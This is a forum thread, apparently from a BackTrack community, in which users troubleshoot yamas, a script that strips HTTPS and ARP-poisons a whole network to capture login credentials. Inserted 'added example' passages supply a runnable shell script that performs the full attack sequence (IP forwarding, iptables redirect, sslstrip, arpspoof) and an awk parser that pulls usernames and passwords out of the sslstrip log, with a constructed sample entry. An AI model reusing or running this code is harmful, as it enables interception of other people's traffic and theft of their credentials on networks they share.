Hi comaX. Many thanks for this wonderful script. I have read through all 18 pages of comments and have also watched the video. I have downloaded and installed the script on my machine. Everything seems to run smoothly; however, when I log in to Twitter / Hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also used the yamas -e option. I am sure there is some setting on my machine which needs to be fixed, but I just do not know which one.
My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.
Note the messages as I launch yamas
Please note the interface and gateway IP are correct.
Code:
[+] Cleaning iptables
[-] Cleaned.
[+] Activating IP forwarding...
[-] Activated.
[+] Configuring iptables...
To what port should the traffic be redirected to? (default = 8080)
Port 8080 selected as default.
From what port should the traffic be redirected to? (default = 80)
Port 80 selected as default.
Traffic from port 80 will be redirected to port 8080
[-] Traffic rerouted
[+] Activating sslstrip...
Choose filename to output : (default = yamas)
Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt
sslstrip 0.9 by Moxie Marlinspike running...
[-] Sslstrip is running.
[+] Activating ARP cache poisoning...
Gateway : 192.168.1.1
Interface : wlan0
Enter IP gateway adress or press enter to use 192.168.1.1.
192.168.1.1 selected as default.
What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.
wlan0 selected as default.
We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D. Press enter to default.
Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched. Keep new window(s) running.
Attack should be running smooth, enjoy.
Attack is running. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option.
Many thanks again.
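The sequence yamas reports in the output above (IP forwarding, port 80 to 8080 redirect, sslstrip on 8080, arpspoof against the gateway), done by hand as an added example. This is my code, not yamas or anything posted in the thread; it exists so each piece can be checked on its own when the capture comes up empty. It assumes the same placeholders as the output (wlan0, 192.168.1.1, ports 80/8080, /tmp/yamas.txt) and the sslstrip 0.9 (-l, -w) and dsniff arpspoof (-i, -t) options. With DRY_RUN=1, the default, it only prints the commands; a real run needs root and the three tools installed. The two helper checks cover the point about monitor mode: the attacking interface must carry an IPv4 address and a default route, which a monitor-mode pseudo-interface does not.

```shell
#!/bin/sh
# Added example: the steps yamas reports, performed by hand. Not yamas code.
# Assumptions (placeholders, override via environment): wlan0, 192.168.1.1,
# ports 80 -> 8080, log in /tmp/yamas.txt. sslstrip 0.9 (-l/-w) and dsniff
# arpspoof (-i/-t) options. DRY_RUN=1 (default) prints instead of executing;
# a real run needs root and all three tools installed.

IFACE="${IFACE:-wlan0}"
GATEWAY="${GATEWAY:-192.168.1.1}"
FROM_PORT="${FROM_PORT:-80}"
TO_PORT="${TO_PORT:-8080}"
LOGFILE="${LOGFILE:-/tmp/yamas.txt}"
DRY_RUN="${DRY_RUN:-1}"

# NAT rule: client HTTP arriving on FROM_PORT is redirected to the local sslstrip port.
redirect_rule() {   # from_port to_port
    echo "iptables -t nat -A PREROUTING -p tcp --dport $1 -j REDIRECT --to-port $2"
}

# sslstrip listening on the redirect port, logging every stripped request to a file.
sslstrip_cmd() {    # listen_port logfile
    echo "sslstrip -l $1 -w $2"
}

# arpspoof: without -t the whole segment is told that this host is the gateway.
arpspoof_cmd() {    # iface gateway [target]
    if [ -n "$3" ]; then
        echo "arpspoof -i $1 -t $3 $2"
    else
        echo "arpspoof -i $1 $2"
    fi
}

# True when the kernel forwards IPv4 (file is normally /proc/sys/net/ipv4/ip_forward).
# Without forwarding, poisoned clients lose connectivity instead of being relayed.
ip_forward_enabled() {  # path
    [ "$(cat "$1" 2>/dev/null)" = "1" ]
}

# The attacking interface needs an IPv4 address and a default route; a monitor-mode
# pseudo-interface such as mon0 has neither, so both checks fail on it.
iface_has_ipv4() {  # iface
    ip -4 -o addr show dev "$1" 2>/dev/null | grep -q 'inet '
}
default_gateway() { # prints the next hop of the default route, if any
    ip route show default 2>/dev/null | awk '/^default/ { print $3; exit }'
}

run() {
    if [ "$DRY_RUN" = "1" ]; then echo "[dry-run] $*"; else eval "$*"; fi
}

main() {
    if [ "$DRY_RUN" != "1" ] && ! iface_has_ipv4 "$IFACE"; then
        echo "$IFACE has no IPv4 address; associate with the AP first" >&2
        return 1
    fi
    run "sysctl -w net.ipv4.ip_forward=1"
    run "iptables -t nat -F"
    run "$(redirect_rule "$FROM_PORT" "$TO_PORT")"
    run "$(sslstrip_cmd "$TO_PORT" "$LOGFILE") &"
    run "$(arpspoof_cmd "$IFACE" "$GATEWAY") &"
}

main
```

Run it once with the default DRY_RUN=1 to see the exact commands, then compare each against what is actually in place (`iptables -t nat -L PREROUTING -n`, `cat /proc/sys/net/ipv4/ip_forward`, `ip route show default`) before blaming the parser.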
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.
World Domination is such an ugly phrase. I prefer the term World Optimization.
Since when can mon0 not associate with an AP? All monitor mode does is enable the ability to sniff raw packet frames from the ether. This is the first I ever heard about monitor mode decreasing functionality...
World Domination is such an ugly phrase. I prefer the term World Optimization.
Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for Hotmail / Twitter. Does it work for others? Have you tried in private browsing mode to avoid anything being transmitted via cookies, for instance? Did you make sure you were not on an https connection? Some sites like Gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip?
As for the mon0/wlan0, it's not really relevant here. Indeed I don't think you can associate with an AP in monitor mode, but what you can do is be connected with wlan0 to an AP, and have a pseudo-interface mon0 in monitor mode. In a nutshell, mon0 itself doesn't connect, but the wireless interface can be connected and in monitor mode.
But once again, I don't really see how that is relevant here, so unless you guys explain in more detail, let's just forget that.
I have some more ideas, but more troubling too, so I'll wait for your feedback before conjecturing horrid stuff.
//
I'll risk getting my ass kicked because it's absolutely irrelevant to BackTrack, but there is this project I started that needs help growing: http://msimdb.comax.fr It's a database of movie quotes in music. It suffers greatly from content and anything non-metal. So if you guys are willing to help in any way you can think of, I'll be super glad! Mods, sorry for doing this.
Last edited by comaX; 06-29-2012 at 04:59 AM.
Running both KDE and GNOME BT5 flawlessly. Thank you !
BTW: I am running version 20120213
First of all, I have tried both options with yamas, I mean the default with sslstrip and yamas -e (which activates ettercap). I have now used a browser with all cookies cleared. I have tried both https and http authentication sites.
The password box does not show me anything.
I am sure this script works, as it seems to be working for everyone else. Is there a debug option in this script? The help file does not say if there is any. Any idea will be appreciated.
@ShadowMaster
Now, in regards to the mon0 issue, what I meant is that you cannot get an IP address from an AP through mon0. Hence no gateway, and this script is not going to work. Please correct me if I am wrong here.
Always willing to learn.
Regards
@comaX Ideas are always welcome, no matter how troubling they may be.
@hannah Why not do what comaX said, which is what I meant, just in more detail. Basically associate with wlan0 and create a pseudo-interface mon0? Also, setting your own default gateway is really not hard... route gw {ip} or something very similar, don't remember off hand, sorry. I'd be more worried about the no IP, which is also easy to set...
World Domination is such an ugly phrase. I prefer the term World Optimization.
The troubling idea would be that they changed the authentication process and I might have to change the parser, which was a pain in the arse back then, and now that I don't have everything in mind, I fear it would be again, with the necessity to first understand what I wrote back then... So yeah, it's troubling.
@Hannah: you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe? (fr.msn.com; us.msn.com... I just made them up, but you know what I mean)
Last edited by comaX; 06-29-2012 at 11:11 AM.
Running both KDE and GNOME BT5 flawlessly. Thank you !
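A small stand-alone parser for the sslstrip log, added here as an example of the kind of parsing comaX refers to. It is my code, not yamas's parser, and it assumes the two-line entries sslstrip 0.9 writes: a timestamped "POST Data (host):" or "SECURE POST Data (host):" header followed by the raw URL-encoded form body on the next line. The sample log is constructed, and values are printed exactly as logged (still URL-encoded). Field names are matched exactly against a short list, so a field like LoginOptions is not mistaken for a login field.

```shell
#!/bin/sh
# Added example: pull credential fields out of an sslstrip log. Not yamas's parser.
# Assumes sslstrip's two-line entries: a timestamped "POST Data (host):" or
# "SECURE POST Data (host):" header, then the URL-encoded body on the next line.
# Values are printed as logged (still URL-encoded). The sample log is constructed.

sample_log() {
cat <<'EOF'
2012-06-29 10:12:01,455 SECURE POST Data (login.live.com):
login=alice%40hotmail.com&passwd=Sup3rSecret&LoginOptions=3&type=11
2012-06-29 10:12:09,002 POST Data (www.example.com):
q=backtrack&submit=Search
EOF
}

# Usage: parse_sslstrip_log [logfile]; reads stdin when no file is given.
# Prints "host name=value" for every field whose name is a known credential field.
parse_sslstrip_log() {
    awk '
        /(SECURE )?POST Data \(/ {
            host = $0
            sub(/.*POST Data \(/, "", host)
            sub(/\).*/, "", host)
            body = 1
            next
        }
        body == 1 {
            n = split($0, kv, "&")
            for (i = 1; i <= n; i++) {
                name = kv[i]
                sub(/=.*/, "", name)
                # exact match, so "LoginOptions" is not reported as a login field
                if (tolower(name) ~ /^(login|user|username|email|pass|passwd|password|pwd)$/)
                    print host, kv[i]
            }
            body = 0
        }
    ' "${1:--}"
}

sample_log | parse_sslstrip_log
```

Point it at the real file with `parse_sslstrip_log /tmp/yamas.txt`. If the log has no "POST Data" entries at all, the problem is upstream of the parser (redirect, forwarding or ARP poisoning); if the entries are there but the field names differ from the list, extend the regex.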
comaX, I know that feel, bro. I am writing a Perl script to help with ASM ghostwriting automation, and since I don't really know Perl, and refuse to write it in py, I basically lost track of the number of times I've had to rewrite portions and figure out what I wanted to do with them. Incidentally, anyone who knows Perl and is willing to help would be amazing. I don't want to post it in the forums until it's done, though.
World Domination is such an ugly phrase. I prefer the term World Optimization.
No, so far it did not work for any other sites either. Yes, I have tried sites like http://www.backtrack-linux.org/ as well, which is not https. Anyway, is there any config file (e.g. etter.conf) I need to manually change, or does your script do that automatically?
What I am thinking now is to get sslstrip / ettercap manually working on my machine and then proceed.
@ShadowMaster: Will heed your advice.